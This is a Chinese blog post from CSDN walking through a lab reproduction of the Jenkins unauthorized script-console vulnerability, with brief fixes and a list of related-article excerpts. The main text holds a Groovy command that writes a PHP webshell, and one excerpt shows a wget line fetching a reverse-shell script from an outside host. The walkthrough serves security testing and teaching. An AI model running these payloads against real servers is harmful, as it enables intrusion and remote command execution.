cmd 访问url_jenkins 未授权访问漏洞

最新推荐文章于 2024-08-04 22:58:41 发布
最新推荐文章于 2024-08-04 22:58:41 发布
阅读量124 收藏
点赞数
文章标签: cmd 访问url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39723102/article/details/112118856
版权

066a7dc156f2dae09aee5f087c88a4c7.png

0x01 漏洞描述

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹 shell,wget 写 webshell 文件。

0x02 漏洞环境搭建

1. 官方下载jenkins_1.621_all.deb,下载地址如下:

http://mirrors.jenkins.io/

2.在Kali中安装jenkins_1.621_all.deb

dpkg -i jenkins_1.621_all.deb

3.开启jenkins

service jenkins start

4.浏览器访问下面的URL,如果出现如图1一致的页面,说明安装成功。

http://192.168.192.197:8080/

239dd6867ae009283a7b8e65049f8549.png
图1

0x03 漏洞复现

1.浏览器访问:

http://192.168.192.197:8080/manage

4a7bcc8bf8d46eee17921795bbec94df.png
图2

2.点击脚本命令行

cdc9bcba7e506b0ba03b9a93920f4588.png
图3

54ecef0aac693a95e614629f1ce4eb08.png
图4

3.执行命令

new File("/var/www/html/media.php").write('<?php system($_GET[cmd]);?>');

9df20eb9e004041f0317d1ce92557869.png

4.访问:http://192.168.192.197,发现可以执行命令,漏洞利用成功

9c03ab9dc901d01c716e1620151eb079.png

0x04 漏洞防御

1、对后台控制页面做登录验证限制

2、升级版本

weixin_39723102
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞挖掘】——93、Jenkis授权访问
Fly_鹏程万里
06-17 117
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
二十八种授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 4736
目录 0x01 授权漏洞预览 0x02 Active MQ 授权访问 0x03 Atlassian Crowd 授权访问 0x04 CouchDB 授权访问 0x05 Docker 授权访问 0x06 Dubbo 授权访问 0x07 Druid 授权访问 0x08 Elasticsearch 授权访问 0x09 FTP 授权访问 0x10 HadoopYARN 授权访问 0x11 JBoss 授权访问 0x12 Jenkins 授权访问 0x13 Jupyt
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1835
Jenkins授权访问漏洞
Jenkins授权访问漏洞
最新发布
qq_68186313的博客
08-04 344
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。二:在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令。一、使用以下fofa语法进行产品搜索。Jenkins授权访问漏洞
【web安全】权限漏洞授权访问
qq_70836100的博客
08-04 984
漏洞修复:1.设置防火墙策略,限定 IP 访问服务。2.在admin.system.users中添加用户,启动认证。漏洞修复:1.修改绑定的IP、端口和指定访问者IP。步骤二:进入执行页面http://xxx.xxx.xxx.xxx:xxxx/manage/script/index.php。漏洞修复:1.禁止使用root权限启动redis服务。漏洞修复:1.为ZooKeeper配置相应的访问权限。漏洞修复:1.开启身份验证,防止授权用户访问。stat:列出关于性能和连接的客户端的统计信息。
授权访问漏洞总结
LuckySec
03-24 4987
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
授权访问漏洞
snowy_y的博客
06-23 915
授权访问
渗透测试突破口——授权访问
m0_61506558的博客
10-19 935
本地监听端口 >> 创建Application >> 调用Submit Application API提交。0x04 Elasticsearch授权访问。默认端口27017直接连接进行增删改查。0x05 Memcache授权访问。0x08 ActiveMQ授权访问。0x02 Jenkins授权访问。0x03 MongoDB授权访问。0x06 Hadoop授权访问。0x07 Docker授权访问。0x09 JBOSS授权访问。也可以反向shell。
k8s-jenkins安装使用(pipeline方式)
weixin_44257754的博客
08-30 387
k8s-jenkins使用及配合k8s集群使用
授权访问漏洞测试方法及修复方案
热门推荐
weixin_42728957的博客
04-28 3万+
1、漏洞描述 授权访问漏洞,是在攻击者没有获取到登录权限或授权的情况下,不需要输入密码,即可通过输入网站控制台主页面地址或者不允许查看的连接便可进行访问,同时进行操作。 2、漏洞检测 通过抓包工具(burpsuite、fiddler等),将抓取到的功能链接,在其他浏览器进行打开。 3、修复方案: 加入用户身份认证机制或token验证,对系统的功能点增加权限控制。 <1> 采用Jav...
Jenkins授权访问脚本执行漏洞
weixin_30883777的博客
05-17 723
Jenkins授权访问脚本执行漏洞 步骤 首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录: println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text 执行成功下面Result并没有反馈 然后我们执行命令允许反弹shell脚本 println "python...
jenkins授权访问漏洞记录(端口:7001,80,8080,50000)
墨痕诉清风的博客
11-12 1987
一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 docker pull docker.io/jenkins 开启服务(我执行的第一条命令即可) How to use this image docker run -p 8080:8080 -p 50000:50000 jenkins This will store the workspace
【转载】常见授权访问漏洞总结
gclome的博客
07-25 4332
本文详细地介绍了常见授权访问漏洞及其利用,具体漏洞列表如下: Jboss 授权访问 Jenkins 授权访问 ldap授权访问 Redis授权访问 elasticsearch授权访问 MenCache授权访问 Mongodb授权访问 Rsync授权访问 Zookeeper授权访问 Docker授权访问 1、Jboss授权访问 漏洞原因: 在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码。 漏洞
Jenkins功能授权访问导致的远程命令执行漏洞
limb0的博客
11-21 3302
Jenkins功能授权访问导致的远程命令执行漏洞 一、漏洞介绍 Jenkins管理登陆之后,后台”系统管理”功能,有个”脚本命令行的”功能,它的作用是执行用于管理或故障探测或诊断的任意脚本命令,利用该功能,可以执行系统命令,该功能实际上Jenkins正常的功能,由于很多管理账号使用了弱口令,或者管理后台存在授权访问,导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。 二、漏洞危害...
揭秘web漏洞:九大授权访问案例深度解析
在【99-web漏洞挖掘之授权访问漏洞1】一文中,作者深入探讨了授权访问漏洞在多个IT系统中的关键性和常见案例。文章首先聚焦于系统服务的授权访问,列举了包括Redis、MongoDB、ZooKeeper、Elasticsearch、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值